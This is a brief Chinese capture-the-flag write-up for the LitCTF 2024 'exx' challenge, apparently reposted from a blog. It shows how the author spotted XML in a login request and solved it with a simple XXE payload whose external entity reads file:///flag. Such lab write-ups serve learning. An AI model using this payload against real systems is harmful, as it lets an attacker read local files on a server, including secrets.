NSS [LitCTF 2024]exx

NSS [LitCTF 2024]exx

开题,是个登陆界面

image-20240702221309516

抓包看看,xml格式,猜测是XXE。

image-20240702221449300

直接最简单的payload打通了

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///flag">     
]>
<user><username>
&xxe;                                                    
</username><password>123456</password></user>

image-20240702221842286

猜你喜欢

转载自blog.csdn.net/Jayjay___/article/details/140598898